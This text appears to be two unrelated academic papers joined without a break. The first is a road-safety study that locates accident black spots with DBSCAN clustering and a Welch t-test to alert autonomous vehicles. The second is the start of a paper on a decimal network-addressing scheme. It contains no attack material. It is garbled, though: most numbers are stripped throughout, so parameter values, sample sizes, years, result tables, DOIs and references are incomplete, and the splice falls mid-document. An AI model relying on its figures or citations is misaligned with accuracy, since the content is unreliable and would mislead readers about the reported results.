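    return [score(x, reason, weights) for x in database]
```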
this article proposes the application of welch's t-test, a two-sample location test used to test the hypothesis that the means of two populations are equal (like the popular student's t-test, but welch's test is more reliable when the sample sizes are significantly different and the variances are also unequal). welch's test assumes that both populations have normal distributions. nevertheless, in the case of moderately large samples and application of the one-tailed test, t-tests are relatively robust to moderate violations of the normality assumption. in this case, the populations are large enough (the full population contains thousands of accidents and black spots also contain several accidents), and the one-tailed test is the appropriate method because we are looking for clusters where the mean is significantly higher than in the entire population. ahad & yahaya show that welch's test can cause type i errors when the variances of the two populations differ and the distributions are non-normal. in this case, the variances are similar, and type i errors are acceptable (some identified black spot candidates may not be real black spots). according to welch's method, the statistic t value is given by:

$$t = \frac{\bar{X}_1 - \bar{X}_2}{\sqrt{\dfrac{V_1}{N_1} + \dfrac{V_2}{N_2}}}$$

where:

- X̄_1 is the mean of the first sample;
- X̄_2 is the mean of the second sample;
- V_1 is the variance of the first sample;
- V_2 is the variance of the second sample;
- N_1 is the size of the first sample;
- N_2 is the size of the second sample.

the degree of freedom (ν) is calculated by:

$$\nu = \frac{\left(\dfrac{V_1}{N_1} + \dfrac{V_2}{N_2}\right)^2}{\dfrac{V_1^2}{N_1^2 (N_1 - 1)} + \dfrac{V_2^2}{N_2^2 (N_2 - 1)}}$$

based on the previously calculated t and ν values, the t-distribution can be used to determine the probability (p). the one-tailed test is applied because it answers the question whether the mean of the cluster is significantly higher than the mean of the entire population. based on p and a previously defined level of significance (α), it is possible to reject the null hypothesis or not. in the case of rejection, it can be assumed that the examined accident reason is related to the accidents as one of the possible causal factors. if the null hypothesis cannot be rejected, there is no evidence for this.

scoring factors

the practical evaluation presented in this paper focuses on one specific accident reason (n = 1), the slippery road condition factor (r_1). the used accident database contains more than two hundred fields, in four categories:

- general accident attributes (date and time, location, nature, etc.);
- general environmental attributes (weather conditions, visibility, etc.);
- data about participants (vehicle or pedestrian, speed, direction, etc.);
- data about injured persons (age of the injured person, etc.).

weighting tables have been developed to estimate the effect of a given accident reason factor on the occurrence of the accident. focusing on the slippery road condition accident factor, the following three types of accident properties can be distinguished:

- some fields directly contain information about the examined factor. in this case, the "road surface" property (abbreviated as roadsrf) of an accident has an "oily, slippery" option. this is taken as the basis for the further weights; the score value assigned to it (w^1_{roadsrf="oily, slippery"}) shows that such an accident is highly affected by the slippery road condition factor. it is worth noting that it is not efficient to make a binary decision about the examined factor based on this value alone, because there are other values ("snowy", "another staining") having similar effects; this is reflected in the weight values.
- in some cases, there are no such direct fields, but it is possible to deduce information about a given factor from the already existing data. for example, in the case of the slippery road condition factor, the weather conditions (wthr property in the database) can help this process. in these cases, the score values assigned to the different weather condition cases give an estimation of how much the given factor affected the occurrence of the accident. in the case of snowing ("snowy"), the assigned weight (w^1_{wthr="snowy"}) is higher than for ideal conditions like "sunny" (w^1_{wthr="sunny"}).
it is also considered that in the case of accident nature “ -slipping, carving, overturning on the road”, the slippery road factor influenced the results (w accnat = = . ) � the last group contains the fields without any relation to the examined factor. for example, fields like “age of the driver” do not affect the results. the weights for all values of these fields are consequently zero. the supplemental file “scoring tables” contains the given weight values for the affected fields. weight values are based on a comprehensive literature review from the fields of road safety and road friction measurements (wallman & Åström, ; andersson et al., ; sokolovskij, ; colomb, duthon & laukkanen, ). however, some of the values are affected by the subjective experiments of the authors. it should take some further research to determine the most efficient weights. results accident database this paper uses the official road accident database of hungary, where data regarding accidents with personal injury are collected by the police. after some conversion and corrections, this dataset is handled by the central statistics department. the completeness of the database is ensured by legislation, and participants of public road accidents with personal injury are obliged to report it to the police. a police officer starts the data collection on the spot by recording the most relevant data about the location and the main attributes of the accidents (participants, casualties, etc.). after days, it is possible to refine the final injury level for all participants. after that finalization step, the central statistics department collects and rechecks all records. road safety engineers and researchers can use this database for their work. the evaluation part of this paper is based on the accidents of this database from january to december . it contains , accidents with personal injury classified into three categories: fatal, serious and slight. there are no accidents in the database without personal injury. because of the high number of accidents and high computational demand of the clustering algorithm, this paper deals with two counties of hungary: accidents of “győr-moson-sopron” county was used to find the optimal parameters of the algorithm and “heves” county was used as a control dataset. dbscan clustering the input database for the clustering was the personal injury accidents of a given county of hungary (“győr-moson-sopron” county). this experiment was performed twice at two consecutive time intervals to measure the robustness of the method. the examined t interval contains the accidents which occurred in january – december . and the t̂ validation interval was january – december . the number of accidents was , in the t interval (the d set contains these accidents) and , in the t̂ interval (the d̂ set contains these accidents). szénási ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ in the hot spot search phase, the following dbscan parameters were used: � ε value: m; � minimum accident count: five accidents; � minimum accident density: . accident/m . the result of this raw dbscan clustering method was black spot candidates in the t interval and black spot candidates in the t̂ interval. 
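a minimal sketch of this clustering step built on scikit-learn and scipy; the radius and density thresholds below are assumed placeholders (the concrete values are those in the parameter list above), the coordinates are assumed to be projected to a planar metric system so that distances and areas are in meters, and degenerate (collinear) clusters are not handled:

```python
import numpy as np
from scipy.spatial import ConvexHull
from sklearn.cluster import DBSCAN

EPS_M = 100.0        # assumed search radius in meters (placeholder value)
MIN_PTS = 5          # minimum accident count of a cluster, as in the parameter list
MIN_DENSITY = 1e-3   # assumed minimum accident density (accidents per square meter)

def black_spot_candidates(xy: np.ndarray):
    """run dbscan on projected accident coordinates and keep the dense clusters."""
    labels = DBSCAN(eps=EPS_M, min_samples=MIN_PTS).fit_predict(xy)
    candidates = []
    for label in set(labels) - {-1}:            # label -1 marks the outliers
        pts = xy[labels == label]
        hull = ConvexHull(pts)                  # boundary convex polygon of the cluster
        area = hull.volume                      # for 2-d input, .volume is the polygon area
        if len(pts) / area >= MIN_DENSITY:      # accident density prerequisite
            candidates.append((pts, pts[hull.vertices], area))
    return candidates
```

the returned corner points (`pts[hull.vertices]`) can be fed directly into the area and density calculations sketched earlier.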
statistical test

unlike traditional black spot searching methods, the next step is not the calculation of some safety potential index but the determination of the different accident reason factors using the scoring method presented in the previous section. considering the r_1 slippery road condition factor, the s_1(x) value is calculated for all x accidents. most of these are not related to slippery road surface reasons, so the s_1 value for them is 0. as a prerequisite for the welch-test, the population of s_1(y) values is generated, where y stands for all accidents in the database, and the main parameters of this sample (number of items, mean and variance) are determined. the same values can be calculated for every black spot candidate by iterating over them. based on the whole-population sample and the black spot candidates, the welch-test was applied to get the statistical result values. according to the welch-test, it is possible to use the student distribution with these parameters and the given level of significance (α) to reject the null hypothesis or not.

the first table below shows the black spot candidates of the t interval where the null hypothesis was rejected because the mean of the r_1 score of the given black spot candidate was significantly higher than the expected average. it can be assumed that these black spots are affected by the examined r_1 factor.

table: accident black spots where the null hypothesis was rejected (location, accident count, mean, variance and probability of the four identified candidates).

the figure below shows the environment and the accidents of the first black spot from this list. as is visible in the satellite image, it is part of a long straight road; consequently, there is no obvious reason for an autonomous car to decrease its speed there.

figure: road accidents of the black spot. map data © google, satellite images © cnes/airbus, geoimage austria, maxar technologies.

from the historical database, the second table below contains detailed information about the accidents of this black spot. as is visible, a high number of accidents are affected by one or more slippery road-related attributes.

table: accidents of the black spot (outcome, road surface, weather and accident nature of the eight recorded accidents).

outcome  surface  weather   accident nature
light    wet      sunny     track leaving
hard     normal   sunny     track leaving
light    wet      rainy     track leaving
hard     wet      rainy     track leaving
hard     wet      rainy     track leaving
light    wet      overcast  frontal crash
light    wet      sunny     slipping, carving
hard     wet      overcast  track leaving

this pattern significantly differs from the expectations; hence, there should be some environmental issue at this location. the examination and elimination of these reasons is the task of road safety experts (orosz et al.). nevertheless, until then, it is worth taking preventive steps to decrease the chance of further accidents. the autonomous vehicle should adapt its control to this situation (speed reduction, using a safer trajectory, etc.).
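a minimal sketch of the one-tailed welch comparison applied above, using scipy (the `alternative` argument of `ttest_ind` requires scipy 1.6 or newer); the score lists are the ones produced by the scoring step sketched earlier:

```python
from scipy import stats

def welch_one_tailed(cluster_scores, population_scores, alpha):
    """test H1: mu_C - mu_D > 0 with welch's (unequal-variance) t-test.

    returns the decision together with the t statistic and the probability p,
    i.e. the quantities reported for each black spot candidate above.
    """
    t, p = stats.ttest_ind(cluster_scores, population_scores,
                           equal_var=False,        # welch's variant of the t-test
                           alternative="greater")  # one-tailed alternative hypothesis
    return p < alpha, t, p
```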
discussion

there is not any generally accepted method for the evaluation of black spots because there is no exact definition of them. based on real-world accident data, there is no list of real black spots either; so, the widely accepted confusion-table-based methods (assigning the clusters into true-positive, false-positive, true-negative and false-negative classes and calculating the common measurements like accuracy, recall, etc.) are not usable here. therefore, it is necessary to evaluate the results based on the general characteristics of these locations. the accident density of black spots is significantly higher than the average; however, this is just a necessary condition and not a sufficient one for validity. because of the high volatility of accidents, the regression-to-the-mean effect can distort the results: it is a well-known statistical phenomenon that roads with a high number of road accidents in a particular period are likely to have fewer during the consecutive period just because of the random fluctuations in crash numbers. in the case of real black spots, the high number of accidents is permanent. thus, a good evaluation technique is to check the number of accidents of the consecutive validation time interval inside the clusters identified in the t interval. there are specific tests for this purpose, introduced by cheng & washington and used by various articles (montella): site consistency tests, method consistency tests, and the total rank differences test. since these were developed for black spot searching methods based on road intervals, it was necessary to adapt them to spatial coordinates and black spot regions. the input series for all tests were the results of the previous black spot identification process:

- C_i is the i-th cluster identified in the D database (1 ≤ i ≤ N, where N is the number of identified black spots in the t interval);
- Ĉ_i is the i-th cluster identified in the D̂ database (1 ≤ i ≤ N̂, where N̂ is the number of identified black spots in the t̂ interval).

site consistency test

this test assumes that any site identified as a black spot in the t time period should also reveal high risk in the subsequent t̂ time period. let P(C) be the convex boundary polygon of the C cluster given by the algorithm presented earlier, and let P be the union of these regions identified in the t time period:

$$P = \bigcup_{i=1}^{N} P(C_i)$$

as the next step, we collect all accidents of the consecutive t̂ time period which are inside the clusters identified in the prior t time period. the T_1 value is the number of these accidents divided by the summarized area of these clusters; thus, it is the accident density of these clusters in the consecutive time period:

$$T_1 = \frac{|\{\, x \in \hat{D} \mid x \text{ inside } P \,\}|}{\sum_{i=1}^{N} A(C_i)}$$

accident reason factor consistency test

as this paper goes further, revealing the accident reason factors, it is also worth checking whether the accidents of the t̂ time period inside the region identified in the t time period have the same attributes or not. this leads to the introduction of the T_1' value, which shows the average score value of these accidents:

$$T_1' = \frac{\sum_{x \in \hat{D}} \begin{cases} s_1(x), & \text{if } x \text{ inside } P \\ 0, & \text{otherwise} \end{cases}}{|\{\, x \in \hat{D} \mid x \text{ inside } P \,\}|}$$
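a minimal sketch of the T_1 and T_1' computations, using shapely for the point-in-polygon tests; the shapely dependency, the dictionary keys and the cluster representation are assumptions, and degenerate (collinear) clusters are ignored:

```python
from shapely.geometry import MultiPoint, Point

def site_and_factor_consistency(clusters_t, accidents_t_hat, score_fn):
    """T_1 and T_1' of the clusters found in period t, evaluated on period t-hat.

    clusters_t      : list of clusters, each a list of (x, y) accident coordinates
    accidents_t_hat : accidents of the validation period, dicts with "x" and "y" keys
    score_fn        : s_1(x), the factor score of a single accident record
    """
    polygons = [MultiPoint(pts).convex_hull for pts in clusters_t]
    total_area = sum(poly.area for poly in polygons)

    # validation-period accidents that fall inside any polygon of the earlier period
    inside = [x for x in accidents_t_hat
              if any(poly.intersects(Point(x["x"], x["y"])) for poly in polygons)]

    t1 = len(inside) / total_area                               # accident density (T_1)
    t1_prime = sum(score_fn(x) for x in inside) / len(inside)   # mean factor score (T_1')
    return t1, t1_prime
```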
method consistency test

it is also assumable that a black spot area identified in the t time period will also be identified as a black spot in the consecutive t̂ time period. a given black spot searching method can be considered consistent if the number of black spots identified in both periods is large, while the number of black spots identified in only one of the examined periods is small. this method consistency is calculated as:

$$T_2 = \frac{|\{C_1, C_2, \dots, C_N\} \cap \{\hat{C}_1, \hat{C}_2, \dots, \hat{C}_{\hat{N}}\}|}{|\{C_1, C_2, \dots, C_N\} \,\triangle\, \{\hat{C}_1, \hat{C}_2, \dots, \hat{C}_{\hat{N}}\}|}$$

where T_2 is the ratio of the number of clusters existing in both search results to the number of clusters given by only the search in the t or only in the t̂ time period (△ stands for the symmetric difference of sets). a pair of clusters from the t and t̂ periods is considered identical if the distance between them is less than a predefined threshold (meters).

rank difference test

the rank difference test is based on the black spots identified in both the t and t̂ periods. the black spots of both periods are sorted by accident density, and the rank difference test shows the difference in the positions of the same cluster in the two lists. the smaller the value, the more consistent the examined method is, because the sequence of the clusters is similar. large values show that the examined method was able to identify the same black spots in both intervals but with different severities relative to each other. let O and Ô be the sequences of black spots identified in both periods (both contain the items of the {C_1, …, C_N} ∩ {Ĉ_1, …, Ĉ_N̂} set), ordered by accident density in the t time period (O) and in the t̂ time period (Ô), respectively; obviously, |O| = |Ô|. the rank difference of the examined method is:

$$T_3 = \frac{\sum_{C \in O} |\operatorname{rank}(C, O) - \operatorname{rank}(C, \hat{O})|}{|O|}$$

where rank(x, y) is the rank of the x black spot in the y sequence.

evaluation results

first, the proposed method was compared to the traditional sliding window method (sw) using dynamic window length. the minimal window length parameter was given in meters, the
consequently, the average of the r score is near to the mean of the population ( . and . compared to . ). contrary to this, the score number for the accidents of the t̂ time interval placed inside the clusters located by the data of the t interval is . , which is significantly higher than the average. these results confirm that the proposed method has very similar characteristics to the already existing methods. the slightly lower t value shows that as a raw black spot searching algorithm, it is not as robust as the alternatives. nonetheless, the t′ result shows table results of the comparison of the sw, dbscan, and darf methods based on the road slippery condition. precision is the ratio of the number of confirmed black spots (identified in both intervals) and the number of all black spots (identified at least in one of the intervals). results are based on the personal injury accidents occured in “győr-moson-sopron” county. value sw dbscan darf bs identified in both t and t̂ bs identified in t but not in t̂ bs identified in t̂ but not in t precision . % . % . % t test result (accidents/m) . . . t′ test result . . . t test result . . . t test result . . . szénási ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ that it is satisfactory for our purpose. it can localize areas when the expected number of accidents with given accident reasons is significantly higher than the average. table shows the same values for another county (“heves”) as a control dataset to check the robustness of the method. as visible, the main characteristics of the results are very similar. in this case, the t and t results are better compared to the alternatives. however, the t′ value is slightly lower, but still significantly higher than the population average. conclusions this work presents a novel, fully automated method updating autonomous vehicles concerning potential road risk factors. the method is based on the dbscan data-mining algorithm, which can localize black spot candidates where the number of accidents is greater than expected. it has several advantages to the traditional sliding window method, especially in built-up areas and accidents occurred at junctions. beyond the traditional road safety engineering work, an additional processing step was also introduced, making assumptions about the main accident reasons. all possible reasons (road slippery, pedestrian issues, etc.) should be checked one-by-one, assigning score values to all accidents. the proposed method considers the distribution of these score values for the full population (all accidents of the given county) and each black spot candidate. using hypotheses tests (one-tailed welch-test), it is possible to select clusters in which the mean of the score values is significantly higher than the expected value (calculated by statistical methods based on the entire accident database). these can be considered as black spots affected by the given factor. the output of this process is a sequence of risky locations on the public road network and a prediction concerning the accident reasons. these would be the base of further research suggesting automatic preventive steps to autonomous vehicles. this dataset can be useful in the route planning phase (try to avoid black spots) and in the traveling phase (take preventive steps when approaching dangerous locations) (alonso et al., ). this knowledge would decrease the number and seriousness of public road accidents. 
table results of the comparison of the sw, dbscan, and darf methods based on the road slippery condition. precision is the ratio of the number of confirmed black spots (identified in both intervals) and the number of all black spots (identified at least in one of the intervals). results are based on the personal injury accidents are occured in “heves” county. value sw dbscan darf bs identified in both t and t̂ bs identified in t but not in t̂ bs identified in t̂ but not in t precision . % . % . % t test result (accidents/m) . . . t′ test result . . . t test result . . . t test result . . . szénási ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ as a limitation, it is worth noting that the proposed method would result in false positive alarms. fortunately, these results are used by autonomous vehicles; therefore, the consequences are usually minor inconveniences (decreasing the speed, etc.) compared to the traditional road safety investigations, where the manual revision is essential. it is also worth seeing that our method is based only on local historical data resulting in problems typical of traditional statistical black spot searching methods (high variation compared to the expected value). it would be worth developing a hybrid method based on the empirical bayes method, which achieves superior control for random variation. the next step of this research project will be the development of these preventive steps. the previously acquired information should be built into the control of the self-driven vehicle to fine-tune its strategy of movement to avoid all predictable risky situations. for example, if the presented method predicts high probability of pedestrian accidents, the car should increase the engine voice volume; in the case of a high chance of frontal accidents, it is worth increasing the power of the headlights; and obviously, decreasing the speed near any of the dangerous locations may decrease the seriousness of most accidents. building an expert system to give similar advice based on the historical data should be the next step of this project. another direction of further development is to make the method more sensitive to real-time environmental conditions. for example, if the autonomous car has to plan a route at night in wet weather, then it should pay more attention to historical accidents that have occurred under similar conditions. this also confirms the fact that it is necessary to make simple and fully automatic algorithms for this purpose to make the fast recalculations available. as another further development, an artificial intelligence based approach should be used to extend the database to solve the problems raised by the limitations of the dataset. acknowledgements the authors would like to thank domokos jankó for his support and novel ideas about the topic. rest in peace our friend. additional information and declarations funding the research presented in this paper was carried out as part of the efop- . . - - - project in the framework of the new széchenyi plan. the completion of this project is funded by the european union and co-financed by the european social fund. the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: new széchenyi plan: efop- . . - - - . european union and european social fund. szénási ( ), peerj comput. sci., doi . /peerj-cs. 
/ http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ competing interests sándor szénási is an academic editor for peerj. author contributions � sándor szénási conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. data availability the following information was supplied regarding data availability: data and code are available in the supplemental files. supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references ahad na, yahaya sss. . sensitivity analysis of welch’s t-test. aip conference proceedings (february ): – . alonso f, alonso m, esteban c, useche sa. . knowledge of the concepts of black spot, grey spot and high accident concentration sections among drivers. science publishing group ( ): – . anderson tk. . kernel density estimation and k-means clustering to profile road accident hotspots. accident analysis & prevention ( ): – doi . /j.aap. . . . andersson m, bruzelius f, casselgren j, gäfvert m, hjort m, hultén j, håbring f, klomp m, olsson g, sjödahl m, svendenius j, woxneryd s, wälivaara b. . road friction estimation ivss project report. available at https://research.chalmers.se/en/publication/ . bálint a, fagerlind h, kullgren a. . a test-based method for the assessment of pre-crash warning and braking systems. accident analysis & prevention : – doi . /j.aap. . . . bíl m, andrášik r, janoška z. . identification of hazardous road locations of traffic accidents by means of kernel density estimation and cluster significance evaluation. accident analysis & prevention ( ): – doi . /j.aap. . . . carsten om, tate fn. . intelligent speed adaptation: accident savings and cost-benefit analysis. accident analysis & prevention ( ): – doi . /j.aap. . . . chatterjee k, hounsell nb, firmin pe, bonsall pw. . driver response to variable message sign information in london. transportation research part c: emerging technologies ( ): – doi . /s - x( ) - . cheng w, washington sp. . experimental evaluation of hotspot identification methods. accident analysis & prevention ( ): – doi . /j.aap. . . . colomb m, duthon p, laukkanen s. . characteristics of adverse weather conditions. in: dense. brussels: cer. delorme r, lassarre s. . a new theory of complexity for safety research—the case of the long-lasting gap in road safety outcomes between france and great britain. safety science : – doi . /j.ssci. . . . szénási ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /j.aap. . . https://research.chalmers.se/en/publication/ http://dx.doi.org/ . /j.aap. . . http://dx.doi.org/ . /j.aap. . . http://dx.doi.org/ . /j.aap. . . http://dx.doi.org/ . /s - x( ) - http://dx.doi.org/ . /j.aap. . . http://dx.doi.org/ . /j.ssci. . . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ elvik r. . a survey of operational definitions of hazardous road locations in some european countries. accident analysis & prevention ( ): – doi . /j.aap. . . . flahaut b, mouchart m, martin es, thomas i. . the local spatial autocorrelation and the kernel method for identifying black zones. accident analysis & prevention ( ): – doi . /s - ( ) - . 
geurts k, wets g, brijs t, vanhoof k, karlis d. . ranking and selecting dangerous crash locations: correcting for the number of passengers and bayesian ranking plots. journal of safety research ( ): – doi . /j.jsr. . . . ghadi m, török Á. . a comparative analysis of black spot identification methods and road accident segmentation methods. accident analysis & prevention : – doi . /j.aap. . . . harper cd, hendrickson ct, samaras c. . cost and benefit estimates of partially-automated vehicle collision avoidance technologies. accident analysis & prevention : – doi . /j.aap. . . . hegyi p, borsos a, koren c. . searching possible accident black spot locations with accident analysis and gis software based on gps coordinates. pollack periodica ( ): – doi . / . . . . . hossain m, abdel-aty m, quddus ma, muromachi y, sadeek sn. . real-time crash prediction models: state-of-the-art, design pathways and ubiquitous requirements. accident analysis & prevention : – doi . /j.aap. . . . jermakian js. . crash avoidance potential of four passenger vehicle technologies. accident analysis & prevention ( ): – doi . /j.aap. . . . kertesz g, felde i. . one-shot re-identification using image projections in deep triplet convolutional network. in: sose, —ieee th international conference of system of systems engineering, proceedings. piscataway: ieee, – . lee s, lee y. . calculation method for sliding-window length: a traffic accident frequency case study. easter asia society for trasportation studies : – . lenard j, badea-romero a, danton r. . typical pedestrian accident scenarios for the development of autonomous emergency braking test protocols. accident analysis & prevention ( ): – doi . /j.aap. . . . mauro r, de luca m, dell’acqua g. . using a k-means clustering algorithm to examine patterns of vehicle crashes in before-after analysis. modern applied science ( ): – . montella a. . a comparative analysis of hotspot identification methods. accident analysis & prevention ( ): – doi . /j.aap. . . . montella a, andreassen d, tarko ap, turner s, mauriello f, imbriani ll, romero ma. . crash databases in australasia, the european union, and the united states. transportation research record: journal of the transportation research board ( ): – doi . / - . murray w, white j, ison s. . work-related road safety: a case study of roche australia. safety science ( ): – doi . /j.ssci. . . . nitsche p, thomas p, stuetz r, welsh r. . pre-crash scenarios at road junctions: a clustering method for car crash data. accident analysis & prevention : – doi . /j.aap. . . . orosz g, mocsári t, borsos a, koren c. . evaluation of low-cost safety measures on the hungarian national road network. in: proceedings of the xxvth world road congress, seoul: world road association, – . szénási ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /j.aap. . . http://dx.doi.org/ . /s - ( ) - http://dx.doi.org/ . /j.jsr. . . http://dx.doi.org/ . /j.aap. . . http://dx.doi.org/ . /j.aap. . . http://dx.doi.org/ . / . . . . http://dx.doi.org/ . /j.aap. . . http://dx.doi.org/ . /j.aap. . . http://dx.doi.org/ . /j.aap. . . http://dx.doi.org/ . /j.aap. . . http://dx.doi.org/ . / - http://dx.doi.org/ . /j.ssci. . . http://dx.doi.org/ . /j.aap. . . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ rosén e, källhammer je, eriksson d, nentwich m, fredriksson r, smith k. . pedestrian injury mitigation by autonomous braking. accident analysis & prevention ( ): – doi . /j.aap. . . . sokolovskij e. . 
automobile braking and traction characteristics on the different road surfaces. transport ( ): – doi . / . . szénási s, jankó d. . internet-based decision-support system in the field of traffic safety on public road networks. in: th european transport conference. budapest, – . toran a, moridpour s. . identifying crash black spots in melbourne road network using kernel density estimation in gis. in: road safety and simulation. wallman c-g, Åström h. . friction measurement methods and the correlation between road friction and traffic safety: a literature review. available at https://books.google.hu/books?id=vl bhqaacaaj. yu h, liu p, chen j, wang h. . comparative analysis of the spatial analysis methods for hotspot identification. accident analysis & prevention ( ): – doi . /j.aap. . . .
international journal of advanced network, monitoring and controls

a full decimal method of address assignment for networked computer

zhan xin, department of information technology, xi'an medical university, xi'an, china, e-mail: @qq.com
xie jianping, chinese decimal network working group; shanghai decimal system network information technology ltd., e-mail: @ .cn
jin liming, chinese decimal network working group; shanghai decimal system network information technology ltd., e-mail: jlm @ .com
lai jiawen, chinese decimal network working group; shanghai decimal system network information technology ltd., e-mail: @ .com

abstract: the full decimal method of address assignment for networked computers and intelligent terminals is realized: addresses are input into the computer through the various input devices of the computer and intelligent terminals, and then the external address of the networked computer and intelligent media stored in the database and the internal arithmetic address are created correspondingly, through a variety of transmission media, by a combination of different computer hardware and software. the new address assignment method can provide sufficient address space for the development of the internet in the future, and it also provides enough addresses for the application of various personal information household appliances, for logistics in electronic commerce, and for other entity and personal communication terminals, while ensuring multiple levels of the address structure. this paper mainly introduces the decimal address allocation algorithm and address format, which provides a solid foundation for the next generation internet architecture design.

keywords: decimal; future network; ipv; address assignment

i. introduction

with the rapid development of science and technology, the world has entered an information age of data communication. the most famous data network is the internet, which can be seen all over the world. in 1969, in order to develop a computer network capable of resisting nuclear attacks, the us department of defense funded the establishment of a packet-switched network named arpanet, which was the earliest prototype of today's internet and is regarded as the forerunner of the information superhighway. nowadays, almost all countries and regions have joined the internet. china has also established a number of international gateways connected to the world's largest internet and achieved a rapid increase in user terminals. every single computer connected to the internet shall be provided with one unique address so that the information can be correctly transmitted to the destination through the internet.
at the present, there are three methods for address preparation in and out of doi: . /ijanmc- - international journal of advanced network, monitoring and controls volume , no. , china: first, the “ip address”, which is composed of four segment of numbers separated by decimal points; second, the “domain name”, which is generally composed of five character strings (subdomains); and third, the “chinese domain system”, which is composed of three levels of domain names separated by decimal points and slashes. although the above address system guarantees each computer a unique address, it is with the unfavorable disadvantages of complex and not uniform, and is difficult to remember and input. at present, the addressing scheme used in the internet is still based on the original ipv protocol, which uses four segments of -bit decimal numerals to allocate the addresses of hosts and other devices connected to the internet. in the meantime, the addresses are marked by the method of “dotted decimal notation”. although those addresses seem to meet the needs of the entire world in the early stage of internet development and ipv made incredible success, in the last two decades in the th century, internet ushered rapid development all over the world and the number of hosts connected to the internet have been doubled every year, therefore, current amount of addresses can no longer meet such development momentum. what’s more, addresses have been more and more extensively applied in logistics code in e-commerce, space code, identity code, digital currency and three-dimensional geographical code and other intelligent terminals, the existing address assignment techniques fail to meet the needs of social development. it is of vital significance to develop an address identification method that can meet activities of human for several years. ii. decimal address assignment algorithm the algorithm in this study can provide a new address assignment method that offers sufficient address space for development of internet in the future, and provides enough address for application of various personal information household appliances and logistics in electronic commerce and other personal communication terminals in a simpler, more convenient way under a lower cost while ensuring multiple levels of the address structure. the method by which address assignment of a networked computer by full-digital codes is with the following characteristics: the foresaid network access number refers to the stipulated numeral number of the website established in accordance with the national and regional regulations; the foresaid telephone number consists of international direct distance dialing codes of the country of the telephone user, area code for domestic direct dialing of the user and the telephone number of the organization where the user works or the user’s personal telephone number; the classification number is the numeric number preceded by the country or the area for unified classified business categories. 
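As a concrete reading of the composition just described, the sketch below assembles a full-digital address from the three components: the network access number, the telephone number (built from the international dialing code, the area code, and the subscriber number), and the classification number. All field values and lengths here are invented for illustration; the scheme itself does not fix them in this passage, and build_full_digital_address is a hypothetical helper, not part of the specification.

```python
def build_full_digital_address(network_access_no: str,
                               country_code: str,
                               area_code: str,
                               subscriber_no: str,
                               classification_no: str) -> str:
    """Concatenate the three components described in Section II:
    network access number + telephone number + classification number."""
    for part in (network_access_no, country_code, area_code,
                 subscriber_no, classification_no):
        if not part.isdigit():
            raise ValueError(f"non-numeric component: {part!r}")
    telephone_number = country_code + area_code + subscriber_no
    return network_access_no + telephone_number + classification_no

# Hypothetical example (all digits invented for illustration):
addr = build_full_digital_address("1234", "86", "21", "63001234", "01")
print(addr)  # -> "123486216300123401", a single all-digit string
```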
the technical scheme is: a full decimal method of address assignment for networked computers and intelligent terminals that is characterized with, address inputting into the computer through input devices of networked computers and intelligent terminals, such as keyboard, bar code, two-dimensional code input device, visual input device and voice input device, and corresponding preparation of external address of networked computer and intelligent media stored in the database and the internal arithmetic address by combination of various computer hardware and software via a variety of transmission media. the address assignment is conducted by the following steps: ) external addresses of all networked computers and intelligent terminals are localized at decimal numbers with the representing range of all decimal integers from to , address are input into the computers via input ports of networked computers and intelligent terminals such as keyboard, voice input device etc.; ) internal address of all networked computers and intelligent terminals are localized at binary numbers international journal of advanced network, monitoring and controls volume , no. , with the representing range of all decimal numbers from to ; ) the addresses can either be corresponded to the binary internal addresses either by the method through which address is with fixed length but variable location or address is with fixed location but variable length; ) in addition to the external addresses, the above mentioned database also stores the original domain names applied in the form of numbers, english and chinese and other different languages, as well as communication numbers such as the existing telephone numbers, area numbers, city numbers, mobile phone numbers, mac address, and the latest digital domain names based on decimal coding; ) the address in the database is directly corresponding to the binary internal address of the computer, and data flow is pointed to the host via computer hardware and software, for instance, the gateway through optical cable through microwave and coaxial cable and other transmission media; the decimal address for character domain name can be found after being resolved through a domain name resolver and pointed to the address of the host, the telephone number; by pointing to the gateway, the mobile phone number and other communication numbers are directly indicated in the communication system to which the communication number is belong. iii. address format and algorithm in all the address assignment methods for networked computers and other intelligent terminals mentioned above, the entire external addresses is evenly divided into domains, domains, domains or domains and each domain address is with the numerical range of the decimal integers from to , to , to or to . in a corresponding way, the internal address is also evenly divided into domains, domains, domains or domains and each domain address is with the numerical range of the binary numbers from to , to , to or to . each domain address must be separated from each other by a separator. if there is a contiguous all-zero domain within the foresaid address or the internal address, a pair of braces or square brackets can be used to replace the all-zero domain. 
if there are more than one contiguous all-zero domain in the address or internal binary address, each contiguous all- domain may be replaced by a pair of braces or square brackets, and a arabic numeral are used to mark the specific amount of all-zero domains in the segment of domain within the brackets. when there is a continuous segment of arabic numerals found in the foresaid address or one domain of the internal binary address, the segment of arabic numerals can be replaced by a pair of round brackets and the omitted numerals, the amount of connectors and omissions shall be clearly marked from the left to the right within the round brackets. in addition, an external address is an address with a multilevel structure, which can be the interface of a single network, namely a unicast address. the unicast address structure is with the following three levels. ) public topology layer: a collection of network providers and network switching equipment for public internet switching service. the public topology layer consists of a address prefix, top-level aggregation identifier, reserved domain, and second-level aggregation identifier. ) station topology layer: a specific local station or organization that not provides public internet switching service outside the station. it is composed of a station-level aggregation identifier. ) network interface identifier: it is a network interface used for identifying the link. besides, the foresaid second-level aggregation identifier can be further divided into internal multilevel hierarchical international journal of advanced network, monitoring and controls volume , no. , structures and the foresaid station-level aggregation identifier can be used to establish its internal addressing structure and identification sub-network, the foresaid network interface identifier can be used in several interfaces at the same node. in many cases, communication between network nodes is limited to a relatively independent region; there is no need for 